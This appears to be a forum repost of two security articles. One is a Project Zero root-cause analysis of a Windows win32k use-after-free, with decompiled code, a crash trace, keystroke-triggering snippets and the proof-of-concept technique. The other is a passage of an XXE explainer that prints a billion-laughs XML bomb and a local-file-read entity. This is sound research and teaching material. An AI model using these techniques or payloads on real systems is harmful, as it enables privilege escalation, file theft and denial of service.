This blog post will share my attempt to complete a root cause analysis of CVE-2019-1458 through binary patch diffing, from the perspective of someone doing research on Windows for the first time. This includes the process I used, a technical description of the “wrong”, but still quite interesting bug I analyzed, and some thoughts on what I learned through this work, such as where I went wrong. This includes the root cause analysis for CVE-2019-1433, that I originally thought was the vulnerability for the in the wild exploit. As far as I know, the vulnerability detailed in this blog post was not exploited in the wild. MY PROCESS When the vulnerability was disclosed on December’s Patch Tuesday, I was immediately interested in the vulnerability. As a part of my new role on Project Zero where I’m leading efforts to study 0-days used in the wild, I was really interested in learning Windows. I had never done research on a Windows platform and didn’t know anything about Windows programming or the kernel. This vulnerability seemed like a great opportunity to start since: Complete details about the specific vulnerability weren't available, It affected both Windows 7 and Windows 10, and The vulnerability is in win32k which is a core component of the Windows kernel. I spent a few days trying to get a copy of the exploit, but wasn’t able to. Therefore I decided that binary patch-diffing would be my best option for figuring out the vulnerability. I was very intrigued by this vulnerability because it affected Windows 10 in addition to Windows 7. However, James Forshaw advised me to patch diff the Windows 7 win32k.sys files rather than the Windows 10 versions. He suggested this for a few reasons: The signal to noise ratio is going to be much higher for Windows 7 rather than Windows 10. This “noise” includes things like Control Flow Guard, more inline instrumentation calls, and “weirder” compiler settings. On Windows 10, win32k is broken up into a few different files: win32k.sys, win32kfull.sys, win32kbase.sys, rather than a single monolithic file. Kaspersky’s blog post stated that not all Windows 10 builds were affected. I got to work creating a Windows 7 testing environment. I created a Windows 7 SP1 x64 VM and then started the long process of patching it up until September 2019 (the last available update prior to the December 2019 update where the vulnerability was supposedly fixed). This took about a day and a half as I worked to find the right order to apply the different updates. Turns out that me thinking that September 2019 was the last available update prior to December 2019 would be one of the biggest reasons that I patch-diffed the wrong bug. I thought that September 2019 was the latest because it was the only update shown to me, besides December 2019, when I clicked “Check for Updates” within the VM. Because I was new to Windows, I didn’t realize that not all updates may be listed in the Windows Update window or that updates could also be downloaded from the Microsoft Update Catalog. When Microsoft told me that I had analyzed the wrong vulnerability, that’s when I realized my mistake. CVE-2019-1433, the vulnerability I analyzed, was patched in November 2019, not December 2019. If I had patch-diffed November to December, rather than September to December, I wouldn’t have gotten mixed up. Once the Windows 7 VM had been updated to Sept 2019, I made a copy of its C:\Windows\System32\win32k.sys file and snapshotted the VM. 
I then updated it to the most recent patch, December 2019, where the vulnerability in question was fixed. I then snapshotted the VM again and saved off the copy of win32k.sys. These two copies of win32k.sys are the two files I diffed in my patch diffing analysis.

Win32k is a core kernel driver that is responsible for the windows that are shown as a part of the GUI. In later versions of Windows, it's broken up into multiple files rather than the single file that it is on Windows 7. Having only previously worked on the Linux/Android and RTOS kernels, the GUI aspects took a little bit of time to wrap my head around. On James Forshaw's recommendation, I cloned my VM so that one VM would run WinDbg and debug the other VM. This allows for kernel debugging. Now that I had a copy of the supposed patched and supposed vulnerable versions of win32k.sys, it's time to start patch diffing.

PATCH DIFFING WINDOWS 7 WIN32K.SYS
I decided to use BinDiff to patch diff the two versions of win32k. In October 2019, I did a comparison on the different binary diffing tools available [video, slides], and for me, BinDiff worked best "out of the box" so I decided to at least start with that again. I loaded both files into IDA and then ran BinDiff between the two versions of win32k. To my pleasant surprise, there were only 23 functions total in the whole file/driver that had changed from one version to another. In addition, there were only two new functions added in the December 2019 file that didn't exist in September. This felt like a good sign: 23 functions seemed like even in the worst case, I could look at all of them to try and find the patched vulnerability. (Between the November and December 2019 updates only 5 functions had changed, which suggests the diffing process could have been even faster.)

Original BinDiff Matched Functions of win32k.sys without Symbols

When I started the diff, I didn't realize that the Microsoft Symbol Server was a thing that existed. I learned about the Symbol Server and was told that I could easily get the symbols for a file by running the following command in WinDbg: x win32k!*. I still hadn't realized that IDA Pro had the capability to automatically get the symbols for you from a PDB file, even if you aren't running IDA on a Windows computer. So after running the WinDbg command, I copied all of the output to a file, rebased my IDA Pro databases to the same base address and then would manually rename functions as I was reversing based on the symbols and addresses in the text file. About a week into this escapade, I learned how to modify the IDA configuration file to have my IDA Pro instance, running on Linux, connect to my Windows VM to get the symbols.

BinDiff Matched Functions of win32k.sys with Symbols

What stood out at first when I looked at BinDiff was that none of the functions called out in Kaspersky's blog post had been changed: not DrawSwitchWndHilite, CreateBitmap, SetBitmapBits, nor NtUserMessageCall. Since I didn't have a strong indicator for a starting point, I instead tried to rule out functions that likely wouldn't be the change that I was looking for. I first searched for function names to determine if they were a part of a different blog post or CVE. Then I looked through all of the CVEs claimed to affect Windows 7 that were fixed in the December Bulletin and matched them up.
Through this I ruled out the following functions: CreateSurfacePal - CVE-2019-1362 RFONTOBJ::bInsterGlyphbitsLookaside, xInsertGlyphbitsRFONTOBJ - CVE-2019-1468 EXPLORING THE WRONG CHANGES At this point I started scanning through functions to try and understand their purpose and look at the changes that were made. GreGetStringBitmapW caught my eye because it had “bitmap” in the name and Kaspersky’s blog post talked about the use of bitmaps. The changes to GreGetStringBitmapW didn’t raise any flags: one of the changes had no functional impact and the other was sending arguments to another function, a function that was also listed as having changed in this update. This function had no public symbols available and is labeled as vuln_sub_FFFFF9600028F200 in the Bindiff image above. In the Dec 2019 win32k.sys its offset from base address is 0x22F200. As shown by the BinDiff flow graph above, there is a new block of code added in the Dec 2019 version of win32k.sys. The Dec 2019 added argument checking before using that argument when calculating where to write to a buffer. This made me think that this was a vulnerability in contention: it’s called from a function with bitmap in the name and appears that there would be a way to overrun a buffer. I decided to keep reversing and spent a few days on this change. I was getting deep down in the rabbit hole though and had to remember that the only tie I had between this function and the details known about the in-the-wild exploit was that “bitmap” was in the name. I needed to determine if this function was even called during the calls mentioned in the Kaspersky blog post. I followed cross-references to determine how this function could be called. The Nt prefix on function names means that the function is a syscall. The Gdi in NtGdiGetStringBitmapW means that the user-mode call is in gdi32.dll. Mateusz Jurczyk provides a table of Windows syscalls here. Therefore, the only way to trigger this function is through a syscall to NtGdiGetStringBitmapW. In gdi32.dll, the only call to NtGdiGetStringBitmapW is GetStringBitmapA, which is exported. Tracing this call path and realizing that none of the functions mentioned in the Kaspersky blog post called this function made me realize that it was pretty unlikely that this was the vulnerability. However, I decided to dynamically double check that this function wouldn’t be called when calling the functions listed in the blog post or trigger the task switch window. I downloaded Visual Studio into my Windows 7 VM and wrote my first Windows Desktop app, following this guide. Once I had a working “Hello, World”, I began to add calls to the functions that are mentioned in the Kaspersky blog post: Creating the “Switch” window, CreateBitmap, SetBitmapBits, NtUserMessageCall, and half-manually/half-programmatically trigger the task-switch window, etc. I set a kernel breakpoint in Windbg on the function of interest and then ran all of these. The function was never triggered, confirming that it was very unlikely this was the vulnerability of interest. I then moved on to GreAnimatePalette. When you trigger the task switch window, it draws a new window onto the screen and moves the “highlight” to the different windows each time you press tab. I thought that, “Sure, that could involve animating a palette”, but I learned from last time and started with trying to trigger the call in WinDbg instead. I found that it was never called in the methods that I was looking at so I didn’t spend too long and moved on. 
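For readers who want to reproduce the breakpoint experiment without building a full Win32 desktop app, the same CreateBitmap()/SetBitmapBits() calls can be exercised from Python via ctypes. This is only an illustrative harness under that assumption, not the test program used in the post:

import ctypes
from ctypes import wintypes

gdi32 = ctypes.WinDLL("gdi32", use_last_error=True)

gdi32.CreateBitmap.argtypes = [ctypes.c_int, ctypes.c_int, wintypes.UINT, wintypes.UINT,
                               ctypes.POINTER(ctypes.c_ubyte)]
gdi32.CreateBitmap.restype = wintypes.HBITMAP
gdi32.SetBitmapBits.argtypes = [wintypes.HBITMAP, wintypes.DWORD, ctypes.POINTER(ctypes.c_ubyte)]
gdi32.SetBitmapBits.restype = wintypes.LONG
gdi32.DeleteObject.argtypes = [wintypes.HGDIOBJ]
gdi32.DeleteObject.restype = wintypes.BOOL

pixels = (ctypes.c_ubyte * (16 * 16 * 4))()       # 16x16 bitmap at 32 bits per pixel
hbm = gdi32.CreateBitmap(16, 16, 1, 32, pixels)   # user-mode wrapper over the NtGdi* syscall
if hbm:
    gdi32.SetBitmapBits(hbm, ctypes.sizeof(pixels), pixels)
    gdi32.DeleteObject(hbm)

With a kernel breakpoint set in the debugger VM, running a loop of calls like this is enough to see whether the function under suspicion is ever hit.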
NARROWING IT DOWN TO xxxNextWindow and xxxKeyEvent After these couple of false starts, I decided to change my process. Instead of starting with the functions in the diff, I decided to start at the function named in Kaspersky’s blog: DrawSwitchWndHilite. I searched the cross-references graph to DrawSwitchWndHilite for any functions listed in the diff as having been changed. As shown in the call graph above, xxxNextWindow is two calls above DrawSwitchWndHilite. When I looked at xxxNextWindow, I then saw that xxxNextWindow is only called by xxxKeyEvent and all of the changes in xxxKeyEvent surrounded the call to xxxNextWindow. These appeared to be the only functions in the diff that lead to a call to DrawSwitchWndHilite so I started reversing to understand the changes. REVERSING THE VULNERABILITY I had gotten symbols for the function names in my IDA databases, but for the vast majority of functions, this didn’t include type information. To begin finding type information, I started googling for different function names or variable names. While it didn’t have everything, ReactOS was one of the best resources for finding type information, and most of the structures were already in IDA. For example, when looking at xxxKeyEvent, I saw that in one case, the first argument to xxxNextWindow is gpqForeground. When I googled for gpqForeground, ReactOS showed me that this variable has type tagQ *. Through this, I also realized that Windows uses a convention for naming variables where the type is abbreviated at the beginning of the name. For example: gpqForeground → global, pointer to queue (tagQ *), gptiCurrent → global, pointer to thread info (tagTHREADINFO *). This was important for the modification to xxxNextWindow. There was a single line change between September and December to xxxNextWindow. The change checked a single bit in the structure pointed to by arg1. If that bit is set, the function will exit in the December version. If it’s not set, then the function proceeds, using arg1. Once I knew that the type of the first argument was tagQ *, I used WinDbg and/or IDA to see its structure. The command in WinDbg is dt win32k!tagQ. At this point, I was pretty sure I had found the vulnerability (😉), but I needed to prove it. This involved about a week more of reversing, reading, debugging, wanting to throw my computer out the window, and getting intrigued by potential vulnerabilities that were not this vulnerability. As a side note, for the reversing, I found that the HexRays decompiler was great for general triage and understanding large blocks of code, but for the detailed understanding necessary (at least for me) for writing a proof-of-concept (POC), I mainly used the disassembly view. RESOURCES Here are some of the resources that were critical for me: “Kernel Attacks Through User- Mode Callbacks” Blackhat USA 2011 talk by Tarjei Mandt [slides, video] I learned about thread locking, assignment locking, and user-mode callbacks. “One Bit To Rule A System: Analyzing CVE-2016-7255 Exploit In The Wild” by Jack Tang, Trend Micro Security Intelligence [blog] This was an analysis of a vulnerability also related to xxxNextWindow. This blog helped me ultimately figure out how to trigger xxxNextWindow and some argument types of other functions. “Kernel exploitation – r0 to r3 transitions via KeUserModeCallback” by Mateusz Jurczyk [blog] This blog helped me figure out how to modify the dispatch table pointer with my own function so that I could execute during the user-mode callback. 
“Windows Kernel Reference Count Vulnerabilities - Case Study” by Mateusz Jurczyk, Zero Nights 2012 [slides] “Analyzing local privilege escalations in win32k” by mxatone, Uninformed v10 (10/2008) [article] P0 Team Members: James Forshaw, Tavis Ormandy, Mateusz Jurczyk, and Ben Hawkes TIMELINE Oct 31 2019: Chrome releases fix for CVE-2019-13720 Dec 10 2019: Microsoft Security Bulletin lists CVE-2019-1458 as exploited in the wild and fixed in the December updates. Dec 10-16 2019: I ask around for a copy of the exploit. No luck! Dec 16 2019: I begin setting up a Windows 7 kernel debugging environment. (And 2 days work on a different project.) Dec 23 2019: VM is set-up. Start patch diffing Dec 24-Jan 2: Holiday Jan 2 - Jan 3: Look at other diffs that weren’t the vulnerability. Try to trigger DrawSwitchWndHilite Jan 6: Realize changes to xxxKeyEvent and xxxNextWindow is the correct change. (Note dear reader, this is not in fact the “correct change”.) Jan 6-Jan16: Figure out how the vulnerability works, go down random rabbit holes, work on POC. Jan 16: Crash POC crashes! Approximately 3 work weeks to set up a test environment, diff patches, and create crash POC. CVE-2019-1458 CVE-2019-1433 ROOT CAUSE ANALYSIS Bug class: use-after-free OVERVIEW The vulnerability is a use-after-free of a tagQ object in xxxNextWindow, freed during a user mode callback. (The xxx prefix on xxxNextWindow means that there is a callback to user-mode.) The function xxxKeyEvent is the only function that calls xxxNextWindow and it calls xxxNextWindow with a pointer to a tagQ object as the first argument. Neither xxxKeyEvent nor xxxNextWindow lock the object to prevent it from being freed during any of the user-mode callbacks in xxxNextWindow. After one of these user-mode callbacks (xxxMoveSwitchWndHilite), xxxNextWindow then uses the pointer to the tagQ object without any verification, causing a use-after free. DETAILED WALK THROUGH This section will walk through the vulnerability on Windows 7. I analyzed the Windows 7 patches instead of Windows 10 as explained above in the process section. The Windows 7 crash POC that I developed is available here. ANALYZED SAMPLES I did the diff and analysis between the September and December 2019 updates of win32k.sys as explained in the “My Process” section. Vulnerable win32k.sys (Sept 2019): 9dafa6efd8c2cfd09b22b5ba2f620fe87e491a698df51dbb18c1343eaac73bcf (SHA-256) Patched win32k.sys (December 2019): b22186945a89967b3c9f1000ac16a472a2f902b84154f4c5028a208c9ef6e102 (SHA-256) OVERVIEW This walk through is broken up into the following sections to describe the vulnerability: Triggering xxxNextWindow Freeing the tagQ (queue) structure User-mode callback xxxMoveSwitchWndHilite Using the freed queue TRIGGERING xxxNextWindow The code path is triggered by a special set of keyboard inputs to open a “Sticky Task Switcher” window. As a side note, I didn’t find a way to manually trigger the code path, only programmatically (not that an individual writing an EoP would need it to be triggered manually). To trigger xxxNextWindow, my proof-of-concept (POC) sends the following keystrokes using the SendInput API: <ALT (Extended)> + TAB + TAB release + ALT + CTRL + TAB + release all except ALT extended + TAB. (See triggerNextWindow function in POC). The “normal” way to trigger the task switch window is with ALT + TAB, or ALT+CTRL+TAB for “sticky”. However, this window won’t hit the vulnerable code path, xxxNextWindow. 
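The exact press/release ordering above matters, and the POC drives it through SendInput with an extended ALT. Purely as an illustration of scripting the sticky task-switcher keys from Python, a simpler keybd_event sketch looks like the following (no guarantee it reaches the vulnerable path):

import time
import ctypes
from ctypes import wintypes

user32 = ctypes.WinDLL("user32", use_last_error=True)
user32.keybd_event.argtypes = [wintypes.BYTE, wintypes.BYTE, wintypes.DWORD, ctypes.c_size_t]
user32.keybd_event.restype = None

VK_TAB, VK_CONTROL, VK_MENU = 0x09, 0x11, 0x12
KEYEVENTF_EXTENDEDKEY, KEYEVENTF_KEYUP = 0x0001, 0x0002

def key_down(vk, flags=0):
    user32.keybd_event(vk, 0, flags, 0)

def key_up(vk, flags=0):
    user32.keybd_event(vk, 0, flags | KEYEVENTF_KEYUP, 0)

# Hold extended ALT + CTRL, tap TAB a couple of times (sticky task switcher), then release.
key_down(VK_MENU, KEYEVENTF_EXTENDEDKEY)
key_down(VK_CONTROL)
for _ in range(2):
    key_down(VK_TAB)
    key_up(VK_TAB)
    time.sleep(0.2)
key_up(VK_CONTROL)
key_up(VK_MENU, KEYEVENTF_EXTENDEDKEY)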
The “normal” task switching window, shown below, looks different from the task switching window displayed when the vulnerable code path is being executed. Shown below is the “normal” task switch window that is displayed when ALT+TAB [+CTRL] are pressed and xxxNextWindow is NOT triggered. The window that is shown when xxxNextWindow is triggered is shown below that. "Normal" task switch window Window that is displayed when xxxNextWindow is called If this is the first “tab press” then the task switch window needs to be drawn on the screen. This code path through xxxNextWindow is not the vulnerable one. The next time you hit TAB, after the window has already been drawn on the screen, when the rectangle should move to the next window, is when the vulnerable code in xxxNextWindow can be reached. FREEING THE QUEUE in xxxNextWindow xxxNextWindow takes a pointer to a queue (tagQ struct) as its first argument. This tagQ structure is the object that we will use after it is freed. We will free the queue in a user-mode callback from the function. At LABEL_106 below (xxxNextWindow+0x847), the queue is used without verifying whether or not it still exists. The only way to reach LABEL_106 in xxxNextWindow is from the branch at xxxNextWindow+0x842. This means that our only option for a user-callback mode is in the function xxxMoveSwitchWndHilite. xxxMoveSwitchWndHilite is responsible for moving the little box within the task switch window that highlights the next window. void __fastcall xxxNextWindow(tagQ *queue, int a2) { [...] V43 = 0; while ( 1 ) { if (gspwndAltTab->fnid & 0x3FFF == 0x2A0 && gspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] && gspwndAltTab->bDestroyed == 0 ) v45 = *(switchWndStruct **)(gspwndAltTab + 0x128); else v45 = 0i64; if ( !v45 ) { ThreadUnlock1(); goto LABEL_106; } handleOfNextWindowToHilite = xxxMoveSwitchWndHilite(v8, v45, isShiftPressed2); ← USER MODE CALLBACK if ( v43 ) { if ( v43 == handleOfNextWindowToHilite ) { v48 = 0i64; LABEL_103: ThreadUnlock1(); HMAssignmentLock(&gspwndActivate, v48); if ( !*(_QWORD *)&gspwndActivate ) xxxCancelCoolSwitch(); return; } } else { v43 = handleOfNextWindowToHilite; } tagWndPtrOfNextWindow = HMValidateHandleNoSecure(handleOfNextWindowToHilite, TYPE_WINDOW); if ( tagWndPtrOfNextWindow ) goto LABEL_103; isShiftPressed2 = isShiftPressed; } [...] LABEL_106: v11 = queue->spwndActive; ← USE AFTER FREE if ( v11 || (v11 = queue->ptiKeyboard->rpdesk->pDeskInfo->spwnd->spwndChild) != 0i64 ) { [...] USER-MODE CALLBACK in xxxMoveSwitchWndHilite There are quite a few different user-mode callbacks within xxxMoveSwitchWndHilite. Many of these could work, but the difficulty is picking one that will reliably return to our POC code. I chose the call to xxxSendMessageTimeout in DrawSwitchWndHilite. This call is sending the message to the window that is being highlighted in the task switch window by xxxMoveSwitchWndHilite. Therefore, if we create windows in our POC, we can ensure that our POC will receive this callback. xxxMoveSwitchWndHilite sends message 0x8C which is WM_LPKDRAWSWITCHWND. This is an undocumented message and thus it’s not expected that user applications will respond to this message. Instead, there is a user-mode function that is automatically dispatched by ntdll!KiUserCallbackDispatcher. The user-mode callback for this message is user32!_fnINLPKDRAWSWITCHWND. In order to execute code during this callback, in the POC we hot-patch the PEB.KernelCallbackTable, using the methodology documented here. 
In the callback, we free the tagQ structure using AttachThreadInput. AttachThreadInput “attaches the input processing mechanism of one thread to that of another thread” and to do this, it destroys the queue of the thread that is being attached to another thread’s input. The two threads then share a single queue. In the callback, we also have to perform the following operations to force execution down the code path that will use the now freed queue: xxxMoveSwitchWndHilite returns the handle of the next window it should highlight. When this handle is passed to HMValidateHandleNoSecure, it needs to return 0. Therefore, in the callback we need to destroy the window that is going to be highlighted. When HMValidateHandleNoSecure returns 0, we’ll loop back to the top of the while loop. Once we’re back at the top of the while loop, in the following code block we need to set v45 to 0. There appear to be two options: fail the check such that you go in the else block or set the extra data in the tagWND struct to 0 using SetWindowLongPtr. The SetWindowLongPtr method doesn’t work because this window is a special system class (fnid == 0x2A0). Therefore, we must fail one of the checks and end up in the else block in order to be in the code path that will allow us to use the freed queue. if (gspwndAltTab->fnid & 0x3FFF == 0x2A0 && gspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] && gspwndAltTab->bDestroyed == 0 ) v45 = *(switchWndStruct **)(gspwndAltTab + 0x128); else v45 = 0i64; USING THE FREED QUEUE Once v45 is set to 0, the thread is unlocked and execution proceeds to LABEL_106 (xxxNextWindow + 0x847) where mov r14, [rbp+50h] is executed. rbp is the tagQ pointer so we dereference it and move it into r14. Therefore we now have a use-after-free. WINDOWS 10 CVE-2019-1433 also affected Windows 10 builds. I did not analyze any Windows 10 builds besides 1903. Vulnerable (Oct 2019) win32kfull.sys: c2e7f733e69271019c9e6e02fdb2741c7be79636b92032cc452985cd369c5a2c (SHA-256) Patched (Nov 2019) win32kfull.sys: 15c64411d506707d749aa870a8b845d9f833c5331dfad304da8828a827152a92 (SHA-256) I confirmed that the vulnerability existed on Windows 10 1903 as of the Oct 2019 patch by triggering the use-after-free with Driver Verifier enabled on win32kfull.sys. Below are excerpts from the crash. ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. 
FAULTING_IP: win32kfull!xxxNextWindow+743 ffff89ba`965f553b 4d8bbd80000000 mov r15,qword ptr [r13+80h] # Child-SP RetAddr Call Site 00 ffffa003`81fe5f28 fffff806`800aa422 nt!DbgBreakPointWithStatus 01 ffffa003`81fe5f30 fffff806`800a9b12 nt!KiBugCheckDebugBreak+0x12 02 ffffa003`81fe5f90 fffff806`7ffc2327 nt!KeBugCheck2+0x952 03 ffffa003`81fe6690 fffff806`7ffe4663 nt!KeBugCheckEx+0x107 04 ffffa003`81fe66d0 fffff806`7fe73edf nt!MiSystemFault+0x1d6933 05 ffffa003`81fe67d0 fffff806`7ffd0320 nt!MmAccessFault+0x34f 06 ffffa003`81fe6970 ffff89ba`965f553b nt!KiPageFault+0x360 07 ffffa003`81fe6b00 ffff89ba`965aeb35 win32kfull!xxxNextWindow+0x743 ← UAF 08 ffffa003`81fe6d30 ffff89ba`96b9939f win32kfull!EditionHandleAndPostKeyEvent+0xab005 09 ffffa003`81fe6e10 ffff89ba`96b98c35 win32kbase!ApiSetEditionHandleAndPostKeyEvent+0x15b 0a ffffa003`81fe6ec0 ffff89ba`96baada5 win32kbase!xxxUpdateGlobalsAndSendKeyEvent+0x2d5 0b ffffa003`81fe7000 ffff89ba`96baa7fb win32kbase!xxxKeyEventEx+0x3a5 0c ffffa003`81fe71d0 ffff89ba`964e3f44 win32kbase!xxxProcessKeyEvent+0x1ab 0d ffffa003`81fe7250 ffff89ba`964e339b win32kfull!xxxInternalKeyEventDirect+0x1e4 0e ffffa003`81fe7320 ffff89ba`964e2ccd win32kfull!xxxSendInput+0xc3 0f ffffa003`81fe7390 fffff806`7ffd3b15 win32kfull!NtUserSendInput+0x16d 10 ffffa003`81fe7440 00007ffb`7d0b2084 nt!KiSystemServiceCopyEnd+0x25 11 0000002b`2a5ffba8 00007ff6`a4da1335 win32u!NtUserSendInput+0x14 12 0000002b`2a5ffbb0 00007ffb`7f487bd4 WizardOpium+0x1335 <- My POC 13 0000002b2a5ffc10 00007ffb7f86ced1 KERNEL32!BaseThreadInitThunk+0x14 14 0000002b2a5ffc40 0000000000000000 ntdll!RtlUserThreadStart+0x21 BUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202 To trigger the crash, I only had to change two things in the Windows 7 POC: The keystrokes are different to trigger the xxxNextWindow task switch window on Windows 10. I was able to trigger it by smashing CTRL+ALT+TAB while the POC was running (and triggering the normal task switch Window). It is possible to do this programmatically, I just didn’t take the time to code it up. Overwrite index 0x61 instead of 0x57 in the KernelCallbackTable. It took me about 3 hours to get the POC to trigger Driver Verifier on Windows 10 1903 regularly (about every 3rd time it's run). Disassembly at xxxNextWindow+737 in Oct 2019 Update Disassembly at xxxNextWindow+73F in Nov 2019 Update The fix in the November update for Windows 10 1903 is the same as the Windows 7 fix: Add the UnlockQueue function. Add locking around the call to xxxNextWindow. Check the “destroyed” bitflag in the tagQ struct before proceeding to use the queue. FIXING THE VULNERABILITY To patch the CVE-2019-1433 vulnerability, Microsoft changed four functions: xxxNextWindow xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10) zzzDestroyQueue UnlockQueue (new function) Overall, the changes are to prevent the queue structure from being freed and track if something attempted to destroy the queue. The addition of the new function, UnlockQueue, suggests that there were no previous locking mechanisms for queue objects. zzzDestroyQueue Patch The only change to the zzzDestroyQueue function in win32k is that if the refcount on the tagQ structure (tagQ.cLockCount) is greater than 0 (keeping the queue from being freed immediately), then the function now sets a bit in tagQ.QF_flags. zzzDestroyQueue Pre-Patch zzzDestroyQueue Post-Patch xxxNextWindow Patch There is a single change to the xxxNextWindow function as shown by the BinDiff graph below. 
When execution is about to use the queue again (at what was LABEL_106 in the vulnerable version), a check has been added to see if a bitflag in tagQ.QF_flags is set. The instructions added to xxxNextWindow+0x847 are as follows where rbp is the pointer to the tagQ structure. bt dword ptr [rbp+13Ch], 1Ah jb loc_FFFFF9600017A0C9 If the bit is set, the function exists. If the bit is not set, the function continues and will use the queue. The only place this bit is set is in zzzDestroyQueue. The bit is set when the queue was destroyed, but couldn't be freed immediately because its refcount (tagQ.cLockCount) is greater than 0. Setting the bit is a new change to the code base as described in the section above. xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10) Patch In this section I will simply refer to the function as xxxKeyEvent since Windows 7 was the main platform analyzed. However, the changes are also found in the EditionHandleAndPostKeyEvent function in Windows 10. The change to xxxKeyEvent is to thread lock the queue that is passed as the first argument to xxxNextWindow. Thread locking doesn’t appear to be publicly documented by Microsoft. My understanding comes from Tarjei Mandt’s 2011 Blackhat USA presentation, “Kernel Attacks through User-Mode Callbacks”. Thread locking is where objects are added to a thread’s lock list, and their ref counter is increased in the process. This prevents them from being freed while they are still locked to the thread. The new function, UnlockQueue, is used to unlock the queue. if ( !queue ) queue = gptiRit->pq; xxxNextWindow(queue, vkey_cp); xxxKeyEvent+92E Pre-Patch if ( !queue ) queue = gptiRit->pq; ++queue->cLockCount; currWin32Thread = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v62); threadLockW32 = currWin32Thread->ptlW32; currWin32Thread->ptlW32 = (_TL *)&threadLockW32; queueCp = queue; unlockQueueFnPtr = (void (__fastcall *)(tagQ *))UnlockQueue; xxxNextWindow(queue, vkey_cp); currWin32Thread2 = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v64); currWin32Thread2->ptlW32 = threadLockW32; unlockQueueFnPtr(queueCp); xxxKeyEvent+94E Post-Patch CONCLUSION So...I got it wrong. Based on the details provided by Kaspersky in their blog post, I attempted to patch diff the vulnerability in order to do a root cause analysis. It was only based on the feedback from Microsoft (Thanks, Microsoft!) and their guidance to look at the InitFunctionTables method, that I realized I had analyzed a different bug. I analyzed CVE-2019-1433 rather than CVE-2019-1458, the vulnerability exploited in the wild. The real root cause analysis for CVE-2019-1458 was documented by @florek_pl here. If I had patch-diffed November 2019 to December 2019 rather than September to December, then I wouldn’t have analyzed the wrong bug. This seems obvious after the fact, but when just starting out, I thought that maybe Windows 7, being so close to end of life, didn’t get updates every single month. Now I know to not only rely on Windows Update, but also to look for KB articles and that I can download additional updates from the Microsoft Update Catalog. Although this blog post didn’t turn out how I originally planned, I decided to share it in the hopes that it’d encourage others to explore a platform new to them. It’s often not a straight path, but if you’re interested in Windows kernel research, this is how I got started. In addition, I think this was a fun and quite interesting bug! 
I didn’t initially set out to do a patch diffing exercise on this vulnerability, but I do think that this work gives us another data point to use in disclosure discussions. It took me, someone with reversing, but no Windows experience, three weeks to understand the vulnerability and write a proof-of-concept. While I ended up doing this analysis for a vulnerability other than the one I intended, many attackers are not looking to patch-diff a specific vulnerability, but rather any vulnerability that they could potentially exploit. Therefore, I think that three weeks can be used as an approximate high upper bound since most attackers looking to use this technique will have more experience. Posted by Tim at 9:32 AM Sursa: https://googleprojectzero.blogspot.com/2020/04/tfw-you-get-really-excited-you-patch.html
-
XML External Entity (XXE) Attacks and How to Avoid Them Category: Web Security Readings - Last Updated: Fri, 03 Apr 2020 - by Zbigniew Banach XXE injection attacks exploit support for XML external entities and are used against web applications that process XML inputs. Attackers can supply XML files with specially crafted DOCTYPE definitions to an XML parser with a weak security configuration to perform path traversal, port scanning, and numerous attacks, including denial of service, server-side request forgery (SSRF), or even remote code execution. Let’s see how XXE injection attacks work, why they are possible, and what you can do to prevent them. How XML Entities Work We’re all familiar with HTML entities corresponding to special characters, such as or ™. In XML documents, new entities can be defined in the DOCTYPE declaration and can contain a wide variety of values, similar to macro definitions in many programming languages. For example: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY bar "World"> ]> <foo>Hello &bar;</foo> In this XML document type, the entity &bar; corresponds to the string World, so the last line simply gives the output Hello World. Crucially for XXE attacks, entity values don’t have to be defined in the document itself, but can also be loaded from external sources, including local files (local from the perspective of the machine where the parser is executed) and URIs. This allows documents to define and reference XML external entities, for example: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///home/myuser/world.txt"> ]> <foo>Hello &xxe;</foo> Assuming the file /home/myuser/world.txt exists and contains the string World, this example will give the same output. XXE Injection Attacks External entities are inherently unsafe because XML processors were not designed to check content, so the resolved entity could contain anything. Combined with the complexity of rarely-used DTD constructs, this provides attackers with many attack vectors. Resource Exhaustion Attacks Even though it doesn’t use external entities, we have to start with the simplest XML-based denial of service attack, known as the Billion Laughs Attack or XML bomb. It relies on combining multiple XML entities that reference each other, for example: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE bomb [ <!ELEMENT bomb ANY> <!ENTITY fun "haha"> <!ENTITY fun1 "&fun;&fun;&fun;&fun;&fun;&fun;&fun;&fun;"> <!ENTITY fun2 "&fun1;&fun1;&fun1;&fun1;&fun1;&fun1;&fun1;&fun1;"> <!ENTITY fun3 "&fun2;&fun2;&fun2;&fun2;&fun2;&fun2;&fun2;&fun2;"> <!-- repeat many more times --> ]> <bomb>&fun3;</bomb> As the XML parser expands each entity, it creates new instances of the first entity at an exponential rate. Even in this short example, the string haha would be generated 83 = 512 times. If parser resources are not capped, this type of attack can quickly exhaust server memory by creating billions of entity instances. (The first published example used the string lol, hence the name “Billion Laughs”.) Another way to achieve resource exhaustion is to inject an external entity that references an endless stream of data, such as /dev/urandom on Linux systems. 
